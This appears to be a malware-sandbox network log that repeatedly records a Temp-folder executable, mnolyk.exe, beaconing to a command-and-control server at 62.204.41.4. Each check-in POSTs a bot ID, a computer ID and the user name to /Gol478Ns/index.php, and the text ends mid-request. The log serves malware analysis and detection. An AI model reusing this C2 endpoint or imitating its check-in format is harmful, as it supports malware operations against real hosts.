                                                        Feb 6, 2023 14:19:17.244961977 CET | 752 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:17.309746027 CET | 752 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        553 | 192.168.2.5 | 50243 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:17.486099958 CET | 753 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:17.552581072 CET | 753 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        554 | 192.168.2.5 | 50244 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:17.729582071 CET | 754 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:17.794356108 CET | 754 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        555 | 192.168.2.5 | 50245 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:17.964917898 CET | 755 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:18.029665947 CET | 755 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        556 | 192.168.2.5 | 50246 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:18.198358059 CET | 756 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:18.267981052 CET | 756 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        557 | 192.168.2.5 | 50247 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:18.456525087 CET | 757 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:18.521711111 CET | 757 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        558 | 192.168.2.5 | 50248 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:18.703803062 CET | 758 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:18.769320965 CET | 758 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        559 | 192.168.2.5 | 50249 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:18.949647903 CET | 759 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.013935089 CET | 759 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        56 | 192.168.2.5 | 49746 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:57.847861052 CET | 257 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:57.920320988 CET | 257 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        560 | 192.168.2.5 | 50250 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:19.184250116 CET | 760 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.252294064 CET | 760 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        561 | 192.168.2.5 | 50251 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:19.419157028 CET | 761 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.485268116 CET | 761 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        562 | 192.168.2.5 | 50252 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:19.663269997 CET | 762 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.728203058 CET | 762 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        563 | 192.168.2.5 | 50253 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:19.903146029 CET | 763 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.967570066 CET | 763 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        564 | 192.168.2.5 | 50254 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:20.138555050 CET | 764 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:20.204947948 CET | 764 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        565 | 192.168.2.5 | 50255 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:20.388212919 CET | 765 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:20.453283072 CET | 765 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        566 | 192.168.2.5 | 50256 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:20.620518923 CET | 766 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:20.685688972 CET | 766 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        567 | 192.168.2.5 | 50257 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:20.856194973 CET | 767 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:20.922713995 CET | 767 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        568 | 192.168.2.5 | 50258 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:21.108803988 CET | 768 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:21.177926064 CET | 768 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        569 | 192.168.2.5 | 50259 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:21.359169960 CET | 769 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:21.423146963 CET | 769 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        57 | 192.168.2.5 | 49747 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:58.093214035 CET | 258 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:58.160079002 CET | 258 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        570 | 192.168.2.5 | 50260 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:21.606827974 CET | 770 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:21.674019098 CET | 770 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        571 | 192.168.2.5 | 50261 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:21.842035055 CET | 771 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
